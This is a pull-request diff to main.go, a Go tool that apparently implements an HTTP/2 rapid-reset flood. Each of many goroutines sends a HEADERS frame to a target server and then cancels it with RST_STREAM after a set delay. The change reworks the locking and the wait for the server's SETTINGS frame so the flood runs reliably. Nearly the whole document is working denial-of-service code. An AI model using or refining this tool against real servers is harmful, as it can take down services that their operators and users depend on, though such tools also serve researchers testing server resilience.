Skip to content
Open
Changes from all commits
Commits
File filter

Filter by extension

Filter by extension

Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
57 changes: 37 additions & 20 deletions main.go
Original file line number Diff line number Diff line change
Expand Up @@ -37,7 +37,7 @@ func init() {
}

// HPACK headers, write HEADERS to server, and send RST_STREAM
func sendRequest(framer *http2.Framer, mu *sync.Mutex, path string, serverURL *url.URL, delay int, doneChan chan<- struct{}) {
func sendRequest(framer *http2.Framer, writeLock *sync.Mutex, path string, serverURL *url.URL, delay int, doneChan chan<- struct{}) {
defer func() {
doneChan <- struct{}{} // Signal that this worker is done
}()
Expand All @@ -53,12 +53,17 @@ func sendRequest(framer *http2.Framer, mu *sync.Mutex, path string, serverURL *u
encoder.WriteField(hpack.HeaderField{Name: ":authority", Value: serverURL.Host})

streamID := atomic.AddUint32(&streamCounter, 2) // Increment streamCounter and allocate stream ID in units of two to ensure stream IDs are odd numbered per RFC 9113
if err := framer.WriteHeaders(http2.HeadersFrameParam{

writeLock.Lock()
err := framer.WriteHeaders(http2.HeadersFrameParam{
StreamID: streamID,
BlockFragment: headerBlock.Bytes(),
EndStream: true,
EndHeaders: true,
}); err != nil {
})
writeLock.Unlock()

if err != nil {
fmt.Printf("[%d] Failed to send HEADERS: %s", streamID, err)
} else {
atomic.AddInt32(&sentHeaders, 1)
Expand All @@ -68,7 +73,11 @@ func sendRequest(framer *http2.Framer, mu *sync.Mutex, path string, serverURL *u
// Sleep for several ms before sending RST_STREAM
time.Sleep(time.Millisecond * time.Duration(delay))

if err := framer.WriteRSTStream(streamID, http2.ErrCodeCancel); err != nil {
writeLock.Lock()
err = framer.WriteRSTStream(streamID, http2.ErrCodeCancel)
writeLock.Unlock()

if err != nil {
fmt.Printf("[%d] Failed to send RST_STREAM: %s", streamID, err)
} else {
atomic.AddInt32(&sentRSTs, 1)
Expand Down Expand Up @@ -111,21 +120,40 @@ func main() {
log.Fatalf("Failed to send client preface: %s", err)
}

// Initialize HTTP2 framer and mutex
// Initialize HTTP2 framer and read/writeLock
framer := http2.NewFramer(conn, conn)
var mu sync.Mutex
var writeLock sync.Mutex
var readLock sync.Mutex

// Send initial SETTINGS frame
mu.Lock()
writeLock.Lock()
if err := framer.WriteSettings(); err != nil {
log.Fatalf("Failed to write settings: %s", err)
}
mu.Unlock()
writeLock.Unlock()

// Wait for SETTINGS frame from server
for {
readLock.Lock()
frame, err := framer.ReadFrame()
readLock.Unlock()

if err != nil {
fmt.Printf("Failed to read frame: %s", err)
}
if frame.Header().Type == http2.FrameSettings {
fmt.Print("got initial SETTINGS frame")
break
}
}

// Read and count received frames, print to stdout
go func() {
for {
readLock.Lock()
frame, err := framer.ReadFrame()
readLock.Unlock()

if err != nil {
if err == io.EOF {
return
Expand All @@ -138,17 +166,6 @@ func main() {
}
}()

// Wait for SETTINGS frame from server
for {
frame, err := framer.ReadFrame()
if err != nil {
fmt.Printf("Failed to read frame: %s", err)
}
if _, ok := frame.(*http2.SettingsFrame); ok {
break
}
}

path := serverURL.Path
if path == "" {
path = "/"
Expand All @@ -161,7 +178,7 @@ func main() {
// Send requests
for i := 0; i < numRequests; i++ {
time.Sleep(time.Millisecond * time.Duration(waitTime))
go sendRequest(framer, &mu, path, serverURL, delayTime, doneChan)
go sendRequest(framer, &writeLock, path, serverURL, delayTime, doneChan)
}

// Wait for all workers to finish
Expand Down